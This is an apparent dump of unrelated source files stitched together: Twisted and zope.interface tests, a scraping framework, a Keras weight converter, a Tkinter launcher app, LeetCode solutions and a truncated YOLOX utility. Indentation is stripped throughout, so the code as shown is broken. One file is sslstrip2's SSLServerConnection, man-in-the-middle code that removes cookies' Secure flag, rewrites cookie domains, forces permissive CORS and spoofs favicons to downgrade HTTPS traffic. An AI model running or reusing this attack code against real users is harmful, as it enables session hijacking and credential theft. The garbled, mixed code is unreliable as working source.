cb = CallbackTracker2(d)
d.addObserver("/message", cb.call2)
d.dispatch(msg)
self.assertEquals(cb.called, 0)
d.dispatch(pres)
self.assertEquals(cb.called, 1)
def testOnetimeDispatch(self):
d = EventDispatcher()
msg = Element(("ns", "message"))
cb = CallbackTracker()
d.addOnetimeObserver("/message", cb.call)
d.dispatch(msg)
self.assertEquals(cb.called, 1)
d.dispatch(msg)
self.assertEquals(cb.called, 1)
def testDispatcherResult(self):
d = EventDispatcher()
msg = Element(("ns", "message"))
pres = Element(("ns", "presence"))
cb = CallbackTracker()
d.addObserver("/presence", cb.call)
result = d.dispatch(msg)
self.assertEquals(False, result)
result = d.dispatch(pres)
self.assertEquals(True, result)
def testOrderedXPathDispatch(self):
d = EventDispatcher()
cb = OrderedCallbackTracker()
d.addObserver("/message/body", cb.call2)
d.addObserver("/message", cb.call3, -1)
d.addObserver("/message/body", cb.call1, 1)
msg = Element(("ns", "message"))
msg.addElement("body")
d.dispatch(msg)
self.assertEquals(cb.callList, [cb.call1, cb.call2, cb.call3],
"Calls out of order: %s" %
repr([c.__name__ for c in cb.callList]))
```
#### File: words/test/test_xmlstream.py
```python
from twisted.trial import unittest
from twisted.words.xish import xmlstream
class XmlStreamTest(unittest.TestCase):
def setUp(self):
self.errorOccurred = False
self.streamStarted = False
self.streamEnded = False
self.outlist = []
self.xmlstream = xmlstream.XmlStream()
self.xmlstream.transport = self
self.xmlstream.transport.write = self.outlist.append
# Auxilary methods
def loseConnection(self):
self.xmlstream.connectionLost("no reason")
def streamStartEvent(self, rootelem):
self.streamStarted = True
def streamErrorEvent(self, errelem):
self.errorOccurred = True
def streamEndEvent(self, _):
self.streamEnded = True
def testBasicOp(self):
xs = self.xmlstream
xs.addObserver(xmlstream.STREAM_START_EVENT,
self.streamStartEvent)
xs.addObserver(xmlstream.STREAM_ERROR_EVENT,
self.streamErrorEvent)
xs.addObserver(xmlstream.STREAM_END_EVENT,
self.streamEndEvent)
# Go...
xs.connectionMade()
xs.send("<root>")
self.assertEquals(self.outlist[0], "<root>")
xs.dataReceived("<root>")
self.assertEquals(self.streamStarted, True)
self.assertEquals(self.errorOccurred, False)
self.assertEquals(self.streamEnded, False)
xs.dataReceived("<child><unclosed></child>")
self.assertEquals(self.errorOccurred, True)
self.assertEquals(self.streamEnded, True)
```
#### File: words/test/test_xpath.py
```python
from twisted.trial import unittest
import sys, os
from twisted.words.xish.domish import Element
from twisted.words.xish.xpath import XPathQuery
from twisted.words.xish import xpath
class XPathTest(unittest.TestCase):
def setUp(self):
# Build element:
# <foo xmlns='testns' attrib1='value1' attrib3="user@host/resource">
# somecontent
# <bar>
# <foo>
# <gar>DEF</gar>
# </foo>
# </bar>
# somemorecontent
# <bar attrib2="value2">
# <bar>
# <foo/>
# <gar>ABC</gar>
# </bar>
# <bar/>
# </foo>
self.e = Element(("testns", "foo"))
self.e["attrib1"] = "value1"
self.e["attrib3"] = "user@host/resource"
self.e.addContent("somecontent")
self.bar1 = self.e.addElement("bar")
self.subfoo = self.bar1.addElement("foo")
self.gar1 = self.subfoo.addElement("gar")
self.gar1.addContent("DEF")
self.e.addContent("somemorecontent")
self.bar2 = self.e.addElement("bar")
self.bar2["attrib2"] = "value2"
self.bar3 = self.bar2.addElement("bar")
self.subfoo2 = self.bar3.addElement("foo")
self.gar2 = self.bar3.addElement("gar")
self.gar2.addContent("ABC")
self.bar4 = self.e.addElement("bar")
def testStaticMethods(self):
self.assertEquals(xpath.matches("/foo/bar", self.e),
True)
self.assertEquals(xpath.queryForNodes("/foo/bar", self.e),
[self.bar1, self.bar2, self.bar4])
self.assertEquals(xpath.queryForString("/foo", self.e),
"somecontent")
self.assertEquals(xpath.queryForStringList("/foo", self.e),
["somecontent", "somemorecontent"])
def testFunctionality(self):
xp = XPathQuery("/foo/bar")
self.assertEquals(xp.matches(self.e), 1)
xp = XPathQuery("/foo/bar/foo")
self.assertEquals(xp.matches(self.e), 1)
self.assertEquals(xp.queryForNodes(self.e), [self.subfoo])
xp = XPathQuery("/foo/bar3")
self.assertEquals(xp.matches(self.e), 0)
xp = XPathQuery("/foo/*")
self.assertEquals(xp.matches(self.e), True)
self.assertEquals(xp.queryForNodes(self.e), [self.bar1, self.bar2, self.bar4])
xp = XPathQuery("/foo[@attrib1]")
self.assertEquals(xp.matches(self.e), True)
xp = XPathQuery("/foo/*[@attrib2='value2']")
self.assertEquals(xp.matches(self.e), True)
self.assertEquals(xp.queryForNodes(self.e), [self.bar2])
# XXX: Revist this, given new grammar
# xp = XPathQuery("/foo/bar[2]")
# self.assertEquals(xp.matches(self.e), 1)
# self.assertEquals(xp.queryForNodes(self.e), [self.bar1])
xp = XPathQuery("/foo[@xmlns='testns']/bar")
self.assertEquals(xp.matches(self.e), 1)
xp = XPathQuery("/foo[@xmlns='badns']/bar2")
self.assertEquals(xp.matches(self.e), 0)
xp = XPathQuery("/foo[@attrib1='value1']")
self.assertEquals(xp.matches(self.e), 1)
xp = XPathQuery("/foo")
self.assertEquals(xp.queryForString(self.e), "somecontent")
self.assertEquals(xp.queryForStringList(self.e), ["somecontent", "somemorecontent"])
xp = XPathQuery("/foo/bar")
self.assertEquals(xp.queryForNodes(self.e), [self.bar1, self.bar2, self.bar4])
xp = XPathQuery("/foo[text() = 'somecontent']")
self.assertEquals(xp.matches(self.e), True)
xp = XPathQuery("/foo[not(@nosuchattrib)]")
self.assertEquals(xp.matches(self.e), True)
xp = XPathQuery("//gar")
self.assertEquals(xp.matches(self.e), True)
self.assertEquals(xp.queryForNodes(self.e), [self.gar1, self.gar2])
self.assertEquals(xp.queryForStringList(self.e), ["DEF", "ABC"])
xp = XPathQuery("//bar")
self.assertEquals(xp.matches(self.e), True)
self.assertEquals(xp.queryForNodes(self.e), [self.bar1, self.bar2, self.bar3, self.bar4])
```
#### File: interface/tests/test_element.py
```python
import unittest
from zope.interface.interface import Element
class TestElement(unittest.TestCase):
def test_taggedValues(self):
"""Test that we can update tagged values of more than one element
"""
e1 = Element("foo")
e2 = Element("bar")
e1.setTaggedValue("x", 1)
e2.setTaggedValue("x", 2)
self.assertEqual(e1.getTaggedValue("x"), 1)
self.assertEqual(e2.getTaggedValue("x"), 2)
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestElement))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
```
#### File: interface/tests/test_verify.py
```python
from zope.interface import Interface, implements, classImplements, Attribute
from zope.interface.verify import verifyClass, verifyObject
from zope.interface.exceptions import DoesNotImplement, BrokenImplementation
from zope.interface.exceptions import BrokenMethodImplementation
import unittest
class Test(unittest.TestCase):
def testNotImplemented(self):
class C(object): pass
class I(Interface): pass
self.assertRaises(DoesNotImplement, verifyClass, I, C)
classImplements(C, I)
verifyClass(I, C)
def testMissingAttr(self):
class I(Interface):
def f(): pass
class C(object):
implements(I)
self.assertRaises(BrokenImplementation, verifyClass, I, C)
C.f=lambda self: None
verifyClass(I, C)
def testMissingAttr_with_Extended_Interface(self):
class II(Interface):
def f():
pass
class I(II):
pass
class C(object):
implements(I)
self.assertRaises(BrokenImplementation, verifyClass, I, C)
C.f=lambda self: None
verifyClass(I, C)
def testWrongArgs(self):
class I(Interface):
def f(a): pass
class C(object):
def f(self, b): pass
implements(I)
# We no longer require names to match.
#self.assertRaises(BrokenMethodImplementation, verifyClass, I, C)
C.f=lambda self, a: None
verifyClass(I, C)
C.f=lambda self, **kw: None
self.assertRaises(BrokenMethodImplementation, verifyClass, I, C)
C.f=lambda self, a, *args: None
verifyClass(I, C)
C.f=lambda self, a, *args, **kw: None
verifyClass(I, C)
C.f=lambda self, *args: None
verifyClass(I, C)
def testExtraArgs(self):
class I(Interface):
def f(a): pass
class C(object):
def f(self, a, b): pass
implements(I)
self.assertRaises(BrokenMethodImplementation, verifyClass, I, C)
C.f=lambda self, a: None
verifyClass(I, C)
C.f=lambda self, a, b=None: None
verifyClass(I, C)
def testNoVar(self):
class I(Interface):
def f(a, *args): pass
class C(object):
def f(self, a): pass
implements(I)
self.assertRaises(BrokenMethodImplementation, verifyClass, I, C)
C.f=lambda self, a, *foo: None
verifyClass(I, C)
def testNoKW(self):
class I(Interface):
def f(a, **args): pass
class C(object):
def f(self, a): pass
implements(I)
self.assertRaises(BrokenMethodImplementation, verifyClass, I, C)
C.f=lambda self, a, **foo: None
verifyClass(I, C)
def testModule(self):
from zope.interface.tests.ifoo import IFoo
from zope.interface.tests import dummy
verifyObject(IFoo, dummy)
def testMethodForAttr(self):
class IFoo(Interface):
foo = Attribute("The foo Attribute")
class Foo:
implements(IFoo)
def foo(self):
pass
verifyClass(IFoo, Foo)
def testNonMethodForMethod(self):
class IBar(Interface):
def foo():
pass
class Bar:
implements(IBar)
foo = 1
self.assertRaises(BrokenMethodImplementation, verifyClass, IBar, Bar)
def test_suite():
loader=unittest.TestLoader()
return loader.loadTestsFromTestCase(Test)
if __name__=='__main__':
unittest.TextTestRunner().run(test_suite())
```
#### File: sslstrip2/sslstrip/SSLServerConnection.py
```python
import logging, re, string
from ServerConnection import ServerConnection
class SSLServerConnection(ServerConnection):
'''
For SSL connections to a server, we need to do some additional stripping. First we need
to make note of any relative links, as the server will be expecting those to be requested
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
'''
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
headExpression = re.compile(r"<head>", re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
def getLogLevel(self):
return logging.INFO
def getPostPrefix(self):
return "SECURE POST"
def handleHeader(self, key, value):
if (key.lower() == 'set-cookie'):
newvalues =[]
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
values = value.split(';')
for v in values:
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
logging.debug("LEO Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.sustitucion
if dominio in real:
v=" Domain=%s"%real[dominio]
logging.debug("LEO New cookie domain parameter: %s"%v)
newvalues.append(v)
value = ';'.join(newvalues)
if (key.lower() == 'access-control-allow-origin'):
value='*'
ServerConnection.handleHeader(self, key, value)
def stripFileFromPath(self, path):
(strippedPath, lastSlash, file) = path.rpartition('/')
return strippedPath
def buildAbsoluteLink(self, link):
absoluteLink = ""
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
logging.debug("Found path-relative link in secure transmission: " + link)
logging.debug("New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
logging.debug("Found relative link in secure transmission: " + link)
logging.debug("New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
def replaceCssLinks(self, data):
iterator = re.finditer(SSLServerConnection.cssExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(1))
return data
def replaceFavicon(self, data):
match = re.search(SSLServerConnection.iconExpression, data)
if (match != None):
data = re.sub(SSLServerConnection.iconExpression,
"<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
else:
data = re.sub(SSLServerConnection.headExpression,
"<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
return data
def replaceSecureLinks(self, data):
data = ServerConnection.replaceSecureLinks(self, data)
data = self.replaceCssLinks(data)
if (self.urlMonitor.isFaviconSpoofing()):
data = self.replaceFavicon(data)
iterator = re.finditer(SSLServerConnection.linkExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(10))
return data
``` |
{
"source": "84KaliPleXon3/transistor",
"score": 2
} |
#### File: books_to_scrape/persistence/newt_db.py
```python
import os
import newt.db
from examples.books_to_scrape.settings import DevConfig, ProdConfig, TestConfig
from transistor.utility.utils import get_debug_flag
def get_config():
if 'appveyor' in os.environ['USERNAME']:
return TestConfig
return DevConfig if get_debug_flag() else ProdConfig
CONFIG = get_config()
ndb = newt.db.connection(CONFIG.NEWT_DB_URI)
```
#### File: examples/books_to_scrape/workgroup.py
```python
from transistor import BaseWorker
from examples.books_to_scrape.persistence import ndb
from transistor.persistence.newt_db.collections import SpiderList
from transistor.utility.logging import logger
class BooksWorker(BaseWorker):
"""
A Worker wraps the custom Spider object and processes it after returning
data from a scrape or crawl. The Worker can be combined into a Group of
an arbitrary number of Workers, to enable gevent based asynchronous I/O.
First, inherit from BaseWorker and then implement the pre_process_exports
and/or post_process_exports methods, as shown below. Other methods
that could be easily overriden include get_spider, get_spider_extractor, and
even process_exports could be overriden if needed.
Also, add any extra class attributes as needed here, to support your custom
Spider and Exporters.
"""
def pre_process_exports(self, spider, task):
"""
A hook point for customization before process_exports method is
called.
In this example, we use this method to save our spider data to
postgresql using newt.db.
:param spider: the Scraper or Crawler object (i.e. MouseKeyScraper())
:param task: just passing through the task item for printing.
"""
if self.job_id != 'NONE':
try:
# create the list with the job name if it doesnt already exist
ndb.root.spiders.add(self.job_id, SpiderList())
logger.info(f'Worker {self.name}-{self.number} created a new spider '
f'list for {self.job_id}')
except KeyError:
# will be raised if there is already a list with the same job_name
pass
# export the scraper data to the items object
items = self.load_items(spider)
# save the items object to newt.db
ndb.root.spiders[self.job_id].add(items)
ndb.commit()
logger.info(f'Worker {self.name}-{self.number} saved {items.__repr__()} to '
f'scrape_list "{self.job_id}" for task {task}.')
else:
# if job_id is NONE then we'll skip saving the objects
logger.info(f'Worker {self.name}-{self.number} said job_name is {self.job_id} '
f'so will not save it.')
def post_process_exports(self, spider, task):
"""
A hook point for customization after process_exports.
In this example, we append the returned scraper object to a
class attribute called `events`.
"""
self.events.append(spider)
logger.info(f'{self.name} has {spider.stock} inventory status.')
logger.info(f'pricing: {spider.price}')
logger.info(f'Worker {self.name}-{self.number} finished task {task}')
```
#### File: transistor/managers/base_manager.py
```python
import gevent
import json
from typing import List, Type, Union
from gevent.queue import Queue, Empty
from gevent.pool import Pool
from gevent.exceptions import LoopExit
from kombu import Connection
from kombu.mixins import ConsumerMixin
from transistor.schedulers.books.bookstate import StatefulBook
from transistor.schedulers.brokers.queues import ExchangeQueue
from transistor.workers.workgroup import WorkGroup
from transistor.exceptions import IncompatibleTasks
from transistor.utility.logging import logger
from kombu.utils.functional import reprcall
class BaseWorkGroupManager(ConsumerMixin):
"""
Base class for a WorkGroupManager.
"""
__attrs__ = [
'book', 'exporter', 'job_id', 'trackers', 'pool', 'qitems',
'workgroups',
]
def __init__(self, job_id, tasks: Type[Union[Type[StatefulBook],
Type[ExchangeQueue]]],
workgroups: List[WorkGroup], pool: int=20,
connection: Connection = None, should_stop=True, **kwargs):
"""
Create the instance.
:param job_id: will save the result of the workers Scrapes to `job_id` list.
If this job_id is "NONE" then it will pass on the save.
:param tasks: a StatefulBook or ExchangeQueue instance.
:param workgroups: a list of class: `WorkGroup()` objects.
:param pool: size of the greenlets pool. If you want to utilize all the
workers concurrently, it should be at least the total number
of all workers + 1 for the manager and +1 for the broker runner in
self.run() method. Otherwise, the pool is also useful to constrain
concurrency to help stay within Crawlera subscription limits.
:param connection: a kombu Connection object, should include the URI to
connect to either RabbitMQ or Redis.
:param should_stop: whether to run indefinitely or to stop after the
manager queue runs empty.
Example:
>>> groups = [
>>> WorkGroup(class_=MouseKeyGroup, workers=5, kwargs={"china":True}),
>>> WorkGroup(class_=MouseKeyGroup, workers=5, kwargs={})
>>> ]
:param pool: number of greenlets to create
"""
self.job_id = job_id
self.tasks = tasks
self.groups = workgroups
self.pool = Pool(pool)
self.qitems = {}
self.workgroups = {}
self.qtimeout = kwargs.get('qtimeout', 5)
self.mgr_qtimeout = self.qtimeout//2 if self.qtimeout else None
self.connection = connection
self.kombu = False
self.mgr_should_stop = should_stop
self.mgr_no_work = False
# call this last
self._init_tasks(kwargs)
def _init_tasks(self, kwargs):
"""
Create individual task queues for the workers.
If, Type[StatefulBook] is passed as the `tasks` parameter, the tracker with
a name that matches a workgroup name, is effectively the workgroup's
task queue. So, extract the tracker name from self.book.to_do()
and the tracker name should match the worker name.
Extract the tracker name and then create qitems:
Example hint, `self.tasks.to_do()` looks like this:
deque([<TaskTracker(name=mousekey.cn)>, <TaskTracker(name=mousekey.com)>])
"""
if isinstance(self.tasks, StatefulBook):
for tracker in self.tasks.to_do():
# set the name of qitems key to tracker.name
self.qitems[tracker.name] = Queue(items=tracker.to_do())
elif isinstance(self.tasks, ExchangeQueue):
for tracker in self.tasks.trackers:
self.qitems[tracker] = Queue()
self.kombu = True
else:
raise IncompatibleTasks('`task` parameter must be an instance of '
'StatefulBook or ExchangeQueue')
# if not a stateful book. The class should have some attribute which
# presents a list-like object, where this list-like object is a
# list of queues.
# classes of type Type[X], where X has attributes X.name and X.to_do(),
# where X.to_do() returns object appropriate for Queue(items=X.to_do())
self._init_workers(kwargs)
def _init_workers(self, kwargs):
"""
Create the WorkGroups by tracker name and assign them by name to the
workgroups dict.
:return:
"""
# first, build a list from tracker names per qitems.keys()
names = [name for name in self.qitems.keys()]
for name in names:
for group in self.groups:
# match the tracker name to the group name
if group.name == name:
# assumes `group` is a WorkGroup namedtuple
# add attrs to group.kwargs dict so they can be passed down
# to the group/worker/spider and assigned as attrs
group.kwargs['name'] = name
group.kwargs['url'] = group.url
group.kwargs['spider'] = group.spider
group.kwargs['worker'] = group.worker
group.kwargs['items'] = group.items
group.kwargs['loader'] = group.loader
# exporters is a list of exporter instances
group.kwargs['exporters'] = group.exporters
if not group.kwargs.get('qtimeout', None):
group.kwargs['qtimeout'] = self.qtimeout
basegroup = group.group(
staff=group.workers, job_id=self.job_id, **group.kwargs)
# now that attrs assigned, init the workers in the basegroup class
basegroup.init_workers()
# lastly, after calling init_workers, assign the workgroup
# instance to the workgroups dict with key = `name`
self.workgroups[name] = basegroup
def get_consumers(self, Consumer, channel):
"""
Must be implemented for Kombu ConsumerMixin
"""
return [Consumer(queues=self.tasks.task_queues,
accept=['json'],
callbacks=[self.process_task])]
def process_task(self, body, message):
"""
Process messages to extract the task keywords and then
load them into a gevent Queue for each tracker.
To customize how this Manger class works with the broker,
this method should be a top consideration to override.
Kwargs is not currently used. But it could be very useful
to set logic flags for use in this method.
"""
keywords = body['keywords']
kwargs = body['kwargs']
logger.info(f'Got task: {reprcall(keywords)}')
try:
if isinstance(keywords, str):
keywords = json.loads(keywords)
for key in self.qitems.keys():
for item in keywords:
self.qitems[key].put(item)
if not self.mgr_should_stop:
if self.mgr_no_work:
gevent.spawn(self.manage).join()
except Exception as exc:
logger.error(f'task raised exception: {exc}')
message.ack()
def spawn_list(self):
""""
The spawn() method begins a new greenlet with the given arguments
(which are passed to the greenlet constructor) and adds it to the
collection of greenlets this group is monitoring.
We return a list of the newly started greenlets, used in a later
'joinall` call.
:return: A list of the newly started greenlets.
"""
# here, workgroups is a list of Type[BaseGroup] objects
workgroups = [val for val in self.workgroups.values()]
spawn_list = [self.pool.spawn(self.monitor, worker) for work_group in
workgroups for worker in work_group]
# we get a blocking error if we spawn the manager first, so spawn it last
spawn_list.append(self.pool.spawn(self.manage))
return spawn_list
def monitor(self, target):
"""
This method actually spawns the spider and then the purpose is to allow
some additional final actions to be performed the worker completes the
spider's job, but before it shuts down and the object instance is lost.
The simplest example which must be implemented:
def monitor(self, target):
'''
The only absolute requirement is to start the spider with
target.spawn_spider() and then call gevent.sleep(0)
'''
target.spawn_spider()
gevent.sleep(0)
A more useful example:
def monitor(self, target):
'''
More useful, would be to hook in some post-scrape logic between
spawn_spider() and gevent.sleep(0).
'''
target.spawn_spider()
# /start --> YOUR POST-SCRAPE HOOK IS HERE, ADD LOGIC AS REQUIRED.
for event in target.events:
# .event is a simple list() as a class attribute, in the scraper object
# we could apply some transformation to an object in event, now.
print(f'THIS IS A MONITOR EVENT - > {event}')
# /end --> YOUR POST SCRAPE HOOK LOGIC. Finally, call gevent.sleep()
gevent.sleep(0)
:param target: a worker
:return:
"""
target.spawn_spider()
gevent.sleep(0)
def manage(self):
""""
Manage will hand out work when the appropriate Worker is free.
The manager timeout must be less than worker timeout, or else, the
workers will be idled and shutdown.
"""
try:
while True:
for name, workgroup in self.workgroups.items():
for qname, q in self.qitems.items():
if name == qname: # workgroup name must match tracker name
# a tracker with the same name as workgroup name, is...
# ...effectively, the workgroup's task queue, so now...
# assign a task to a worker from the workgroup's task queue
for worker in workgroup:
one_task = q.get(timeout=self.mgr_qtimeout)
worker.tasks.put(one_task)
gevent.sleep(0)
except Empty:
self.mgr_no_work = True
if self.mgr_should_stop:
logger.info(f"Assigned all {name} work. I've been told I should stop.")
self.should_stop = True
else:
logger.info(f"Assigned all {name} work. Awaiting more tasks to assign.")
def main(self):
spawny = self.spawn_list()
if self.kombu:
gevent.spawn(self.run).join()
try:
gevent.pool.joinall(spawny)
except LoopExit:
logger.error('No tasks. This operation would block forever.')
# print([worker.get() for worker in spawny])
gevent.sleep(0)
``` |
{
"source": "84moto/mamecog",
"score": 2
} |
#### File: 84moto/mamecog/mamecog_converter.py
```python
import sys
import numpy as np
import tensorflow as tf
from tensorflow import keras
# Kerasで作成された学習済みモデル(h5ファイル)を読み込み、
# Conv2D層とDense層のKernelとBiasを取り出して、
# まめコグC#ライブラリで読み込み可能なバイナリファイルに保存する。
def mamecog_convert(src_h5_fname):
model = keras.models.load_model(src_h5_fname)
model.summary()
layer_num = len(model.layers)
for layer_idx in range(layer_num):
print("\nLayer", layer_idx+1)
layer = model.layers[layer_idx]
print(layer.name)
if isinstance(layer, keras.layers.Conv2D):
print("Kernel shape")
print(layer.kernel.shape)
print("Bias shape")
print(layer.bias.shape)
# Kernelを下記のかたちのC#のfloat配列として読み込めるように
# バイナリファイルに保存する
# [出力面の数、入力面の数、カーネル縦サイズ、カーネル横サイズ]
fname_k = str(layer_idx+1) + "_" + layer.name + "_k.bin"
save_bin_k = layer.kernel.numpy().transpose(3,2,0,1)
save_bin_k.tofile(fname_k)
print("=> " + fname_k)
# Biasを[出力面の数]のサイズのfloat配列として
# C#で読み込めるようにバイナリファイルに保存する
fname_b = str(layer_idx+1) + "_" + layer.name + "_b.bin"
save_bin_b = layer.bias.numpy()
save_bin_b.tofile(fname_b)
print("=> " + fname_b)
if isinstance(layer, keras.layers.Dense):
print("Kernel shape")
print(layer.kernel.shape)
print("Bias shape")
print(layer.bias.shape)
# Kernelを[出力Cellの数、入力Cellの数]のfloat配列として
# C#で読み込めるようにバイナリファイルに保存する
fname_k = str(layer_idx+1) + "_" + layer.name + "_k.bin"
save_bin_k = layer.kernel.numpy().transpose(1,0)
save_bin_k.tofile(fname_k)
print("=> " + fname_k)
# Biasを[出力面の数]のサイズのfloat配列として
# C#で読み込めるようにバイナリファイルに保存する
fname_b = str(layer_idx+1) + "_" + layer.name + "_b.bin"
save_bin_b = layer.bias.numpy()
save_bin_b.tofile(fname_b)
print("=> " + fname_b)
print("\nConvert done.")
if __name__ == "__main__":
args = sys.argv
if len(args) == 2:
mamecog_convert(args[1])
else:
print("Usage: mamecog_converter.py srcfilename")
#end
``` |
{
"source": "84n4n4j03/pinit",
"score": 3
} |
#### File: pinit/menus/argumentmenu.py
```python
import tkinter as tk
from menus.basemenu import BaseMenu
import subprocess as sp
class ArgumentMenu(BaseMenu):
def __init__(self, argumentString, button):
BaseMenu.__init__(self, "specify arguments")
self.__argumentString = argumentString
self.__button = button
self.__argument_names = [argument.split(")")[0] for argument in argumentString.split("$(")
if ")" in argument]
self.__arguments = {}
#print("self.__argument_names", self.__argument_names)
def __paint_argument_row(self, lf, argument, row_number):
tk.Label(lf, text=argument).grid(row=row_number, column=0)
entry = tk.Entry(lf, width=50)
entry.grid(row=row_number, column=1)
self.__arguments[argument] = entry
def __paint_execute_button(self, lf, row_number):
btn = tk.Button(lf, text="execute (or hit Enter)", command=self.__execute)
btn.grid(row=row_number, column=0, columnspan=2)
def __paint(self):
lf = tk.LabelFrame(self._frame, text=self.__argumentString)
self._parent.bind('<Return>', self.__execute)
lf.pack(side="top")
row_number = 0
for argument in self.__argument_names:
self.__paint_argument_row(lf, argument, row_number)
row_number += 1
self.__paint_execute_button(lf, row_number)
def __execute(self, event=None):
argString = self.__argumentString
for argument, entry in self.__arguments.items():
argString = argString.replace("$("+argument+")", entry.get())
self.__button.execute(argString)
def open_as_window(self):
if self.is_opened():
return
self._open(True)
self.__paint()
def _on_mouse_entered(self, event):
pass # override action from basemenu
def _on_mouse_left(self, event):
pass # override action from basemenu
```
#### File: pinit/misc/storagemanager.py
```python
import menus.mainmenu
import menus.pinmenu
import buttons.configbutton
import buttons.savebutton
import buttons.actionbutton
import buttons.dirbutton
import buttons.menubutton
import json
class StorageManager(object):
FILENAME = None
def __init__(self, layout_file=None):
if layout_file:
StorageManager.FILENAME = layout_file
if not StorageManager.FILENAME:
raise StorageManagerException("no layout file specified")
def load(self):
try:
with open(StorageManager.FILENAME, "r") as f:
js = f.read()
except:
print("unable to load saved layout")
return None
d = json.loads(js)
if not "mainmenu.MainMenu" in d["type"]:
raise StorageManagerException("no MainMenu found in toplevel")
mainMenu = menus.mainmenu.MainMenu(d["name"], create_empty=True)
for button in d["buttons"]:
self.__add_button(mainMenu, button)
return mainMenu
def save(self, mainMenu):
print("store to: " + StorageManager.FILENAME)
s = json.dumps(mainMenu.get_storage_description(), sort_keys=True, indent=4)
with open(StorageManager.FILENAME, "w") as f:
f.write(s)
def __add_button(self, menu, button):
if "configbutton.ConfigButton" in button["type"]:
menu.add_button(buttons.configbutton.ConfigButton(menu, button["color"]))
elif "savebutton.SaveButton" in button["type"]:
menu.add_button(buttons.savebutton.SaveButton(menu, button["color"]))
elif "actionbutton.ActionButton" in button["type"]:
menu.add_button(buttons.actionbutton.ActionButton(button["name"],
button["cmd"], button["color"]))
elif "dirbutton.DirButton" in button["type"]:
menu.add_button(buttons.dirbutton.DirButton(button["name"],
button["directory"], button["color"]))
elif "menubutton.MenuButton" in button["type"]:
menu.add_button(buttons.menubutton.MenuButton(button["name"],
self.__create_submenu(button["submenu"]), button["color"]))
else:
raise StorageManagerException("unknown buttontype")
menu.get_buttons()[-1].add_description(button["description"])
def __create_submenu(self, submenu):
if not "pinmenu.PinMenu" in submenu["type"]:
raise StorageManagerException("no PinMenu found as submenu")
pinMenu = menus.pinmenu.PinMenu(submenu["name"], create_empty=True)
for button in submenu["buttons"]:
self.__add_button(pinMenu, button)
return pinMenu
class StorageManagerException(Exception):
def __init__(self, reason):
self.reason = reason
def __str__(self):
return "Error reason: " + self.reason
```
#### File: 84n4n4j03/pinit/pinit.py
```python
from menus.pinmenu import PinMenu
from buttons.basebutton import BaseButton
from buttons.actionbutton import ActionButton
from buttons.menubutton import MenuButton
from menus.mainmenu import MainMenu
from buttons.savebutton import SaveButton
import json
from misc.storagemanager import StorageManager
from misc.windowmgr_gtk import WindowMgr
import argparse
import os
class PinIt(object):
def __init__(self, layout_file):
self.__mainMenu = StorageManager(layout_file).load()
if not self.__mainMenu:
print("create new")
self.__mainMenu = MainMenu("mainMenu")
self.__mainMenu.open_as_window()
self.__windowMgr = WindowMgr()
os.environ["PINIT_ROOT_DIR"] = os.path.dirname(os.path.realpath(__file__))
os.environ["PINIT_LAYOUT_DIR"] = os.path.dirname(os.path.realpath(layout_file))
def run(self):
print("PinIt by <NAME>")
print("visit https://github.com/84n4n4j03/pinit")
self.__mainMenu.run()
def run():
description="""
Lightweight GUI to simply create buttons to fire
commands, programms, web-pages, ...
Easily organize these buttons in submenus and
pin them wherever needed on the screen.
They're always on top.
"""
parser = argparse.ArgumentParser(description=description)
parser.add_argument('-l', '--layout', default='../layout.js',
help='specify a json layout file (default: ../layout.js)')
args = parser.parse_args()
pinIt = PinIt(args.layout)
pinIt.run()
if __name__ == "__main__":
run()
``` |
{
"source": "85151/hw1-hw10.py",
"score": 4
} |
#### File: 85151/hw1-hw10.py/hw10.py
```python
class Solution:
def thirdMax(self, nums: List[int]) -> int:
nums = set(nums)
for _ in range((2, 0)[len(nums) < 3]): nums.remove(max(nums))
return max(nums)
```
#### File: 85151/hw1-hw10.py/hw1.py
```python
class Solution:
def arrayPairSum(self, nums: List[int]) -> int:
nums = sorted(nums)
return sum(nums[i] for i in range(0, len(nums), 2))
```
#### File: 85151/hw1-hw10.py/hw3.py
```python
class Solution:
def heightChecker(self, heights):
a = sorted(heights)
return sum([1 for i in range(len(heights)) if (a[i] != heights[i])])
```
#### File: 85151/hw1-hw10.py/hw9.py
```python
class Solution:
def isPowerOfTwo(self, n: int) -> bool:
import math
if n<=0:
return False
elif round(math.log(n,2),9)==float(int(math.log(n,2))):
return True
else:
return False
``` |
{
"source": "851624623/YOLOX",
"score": 2
} |
#### File: yolox/utils/model_utils.py
```python
import contextlib
from copy import deepcopy
from typing import Sequence
import torch
import torch.nn as nn
from thop import profile
__all__ = [
"fuse_conv_and_bn",
"fuse_model",
"get_model_info",
"replace_module",
"freeze_module",
"adjust_status",
]
def get_model_info(model: nn.Module, tsize: Sequence[int]) -> str:
'''
FLOPS:注意全大写,是floating point operations per second的缩写,意指每秒浮点运算次数,理解为计算速度。是一个衡量硬件性能的指标。
